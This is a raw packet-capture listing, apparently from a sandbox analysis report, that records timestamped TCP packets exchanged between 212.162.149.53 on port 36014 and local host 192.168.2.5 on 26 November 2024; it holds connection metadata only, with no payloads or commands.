Nov 26, 2024 09:01:52.414999962 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415009975 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415069103 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415080070 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415127039 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415163994 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415174961 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415214062 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415260077 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415271044 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415302992 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415355921 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415438890 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415450096 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415545940 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415555954 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415604115 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415621996 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415674925 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415684938 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415719986 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415739059 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.415816069 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.416068077 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.416126966 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.519923925 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534302950 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534334898 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534431934 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534441948 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534492970 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534503937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534579039 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534589052 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534727097 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534738064 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534825087 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534835100 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534878969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.534924984 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535060883 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535070896 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535135031 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535150051 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535188913 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535209894 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535300970 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535326958 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535376072 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535435915 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535528898 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535578966 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535672903 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535681963 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535792112 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535801888 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535847902 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.535922050 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536036015 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536046028 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536113977 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536124945 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536144018 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536153078 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536194086 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536204100 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536245108 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536253929 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536339045 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536382914 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536427021 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536485910 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536557913 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536567926 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536581039 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536598921 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536761045 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536772013 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536947966 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536957979 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.536967039 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537095070 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537105083 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537113905 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537123919 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537193060 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537245035 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537265062 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.537293911 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537334919 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.537341118 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537350893 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537359953 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537386894 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537498951 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537508011 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537571907 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537591934 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537749052 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537760019 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537794113 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537806034 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537873983 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537919044 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537947893 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.537967920 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538050890 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538060904 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538079023 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538103104 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538168907 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538214922 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538305998 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538316965 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538333893 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538345098 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538429022 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538439035 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538516045 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538568974 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538652897 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538717985 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538834095 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538842916 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.538990021 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539047956 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539103031 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539165020 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539226055 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539283991 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539374113 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539383888 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539474010 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539484024 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539509058 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539580107 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.539875984 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.539951086 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.657547951 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.657612085 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.657623053 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.657632113 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.657818079 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.657826900 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.657962084 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.658026934 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.658657074 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.658993959 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.659328938 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.659339905 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.659949064 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.660123110 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661180019 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661190033 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661200047 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661211014 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661220074 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661230087 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661242008 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661258936 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661268950 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661278009 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661286116 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661294937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661304951 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661314011 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661323071 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661331892 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661340952 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661350012 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661359072 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661367893 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661376953 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661380053 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661390066 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661406040 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661415100 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661418915 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661422968 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661426067 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661429882 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661438942 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661448002 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661458969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661489010 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661498070 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661505938 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661509991 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661520958 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661530018 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661540031 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661547899 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661556959 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661569118 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661696911 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661706924 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661837101 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661845922 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661864042 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661873102 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.661871910 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.661966085 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.662020922 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662163019 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662349939 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662359953 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662516117 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662525892 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662537098 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662663937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662673950 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662826061 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662836075 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662844896 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662962914 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662971973 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662981033 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.662991047 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663122892 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663132906 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663266897 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663275957 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663285017 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663292885 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663628101 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663639069 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663767099 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663775921 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663846016 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663856983 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663867950 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663877010 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663896084 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663912058 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663922071 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663929939 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.663938999 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664009094 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664058924 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664068937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664164066 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664174080 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664230108 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664273977 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664371967 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664436102 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664454937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.664733887 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.664793015 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.784117937 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784132957 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784230947 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784240961 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784245014 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784254074 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784393072 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784403086 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784738064 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784748077 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784909010 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784919977 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784928083 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784938097 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.784946918 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.785062075 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.785777092 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.785963058 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.785972118 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786106110 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786128044 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786278963 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786462069 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786475897 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786617994 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786628008 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786798954 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786809921 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786950111 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.786961079 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787081957 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787091970 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787101030 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787112951 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787235975 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787245989 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787254095 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787264109 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787367105 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787378073 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787386894 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787396908 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787405014 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787416935 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787502050 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787512064 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787519932 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787528992 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787657976 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787677050 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.787990093 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788000107 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788137913 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788157940 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788167000 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788305044 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788315058 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788440943 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.788465023 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788539886 CET	49734	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:52.788615942 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788626909 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788635969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788748026 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788758039 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788767099 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788775921 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788928032 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.788944960 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789083958 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789093971 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789103031 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789212942 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789232969 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789242029 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789383888 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789551973 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789561987 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789694071 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789704084 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789717913 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789879084 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.789889097 CET	36014	49734	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:52.790030003 CET	36014	49734	212.162.149.53	192.168.2.5
